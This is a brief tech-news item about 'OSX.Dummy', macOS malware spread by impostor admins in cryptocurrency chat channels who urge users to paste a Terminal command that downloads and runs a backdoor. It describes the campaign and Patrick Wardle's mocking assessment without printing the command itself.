Really dumb malware targets cryptocurrency fans using Macs
Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs. The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker.
Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it "OSX.Dummy" because, as he wrote:
- the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it's trivial to detect at every step (that dumb)
- ... and finally, the malware saves the user's password to dumpdummy
The attack, first noted by Remco Verhoef of SANS today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this:
Read 3 remaining paragraphs | Comments